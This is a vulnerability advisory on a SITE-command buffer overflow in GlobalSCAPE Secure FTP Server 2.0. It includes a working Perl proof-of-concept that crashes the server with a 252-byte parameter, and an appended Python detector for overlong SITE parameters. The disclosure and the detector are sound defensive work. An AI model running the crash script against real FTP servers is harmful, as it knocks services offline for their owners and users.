GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)

Summary

A vulnerability in GlobalSCAPE Secure FTP Server allows a user who issues a long parameter (around 252 bytes) as the value for a SITE command to make the server attempt a write to an address outside the Secure FTP Server's memory. This in turn triggers an unhandled exception, which causes the program to crash.

Credit:

SecurITeam would like to thank STORM for finding this vulnerability.


Details

Vulnerable Systems:
 * GlobalSCAPE Secure FTP Server version 2.0 Build 03.11.2004.2

Immune Systems:
 * GlobalSCAPE Secure FTP Server version 2.0 Build 03.16.2004.1

Exploit:
To demonstrate this issue we will use the SITE ZIP command. Even though SITE ZIP is not a supported command, its '/d:' parameter is still parsed when supplied after the command, and that parsing is what triggers the vulnerability.

#!/usr/bin/perl

use IO::Socket;

$host = '192.168.1.243';

$remote = IO::Socket::INET->new ( Proto => 'tcp', PeerAddr => $host, PeerPort => '2117');

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join('', 'PASS ', 'a@b.com', "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

$ftp = join ('', 'SITE ZIP /d:', 'A'x(252), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;
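
A defensive check for the condition described above, as an added example that is not part of the original advisory: it scans FTP control-channel client lines and flags SITE commands whose parameter is longer than a limit. The 128-byte limit, the function names and the sample lines are assumptions made for this example.

```python
"""Flag overlong SITE parameters in FTP control-channel commands (added example)."""

# Assumed policy value: the advisory reports a crash at around 252 bytes,
# so this hypothetical limit is set well below that.
MAX_SITE_PARAM = 128

def parse_command(line: bytes):
    """Split one client line into (verb, argument); both are bytes."""
    text = line.rstrip(b"\r\n")
    verb, _, arg = text.partition(b" ")
    return verb.upper(), arg

def check_line(line: bytes, limit: int = MAX_SITE_PARAM):
    """Return a finding dict for a SITE command whose parameter is too long, else None."""
    verb, arg = parse_command(line)
    if verb != b"SITE":
        return None
    # The first token after SITE is the subcommand; the rest is its parameter.
    sub, _, param = arg.lstrip().partition(b" ")
    if len(param) <= limit:
        return None
    return {
        "subcommand": sub.upper().decode("ascii", "replace"),
        "param_len": len(param),
        "preview": param[:16].decode("ascii", "replace"),
    }

def scan(lines, limit: int = MAX_SITE_PARAM):
    """Yield (line_number, finding) for every flagged line in a capture."""
    for number, line in enumerate(lines, start=1):
        finding = check_line(line, limit)
        if finding:
            yield number, finding

# Constructed sample of client-to-server lines, not taken from a real capture.
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS a@b.com\r\n",
    b"SITE CHMOD 644 report.txt\r\n",
    b"SITE ZIP /d:" + b"A" * 252 + b"\r\n",
    b"site zip /d:" + b"B" * 300 + b"\n",
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE):
        print(number, finding)
```

The check matches on the SITE verb rather than on ZIP, since the summary describes the long value as a parameter of a SITE command in general.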

Categories: Windows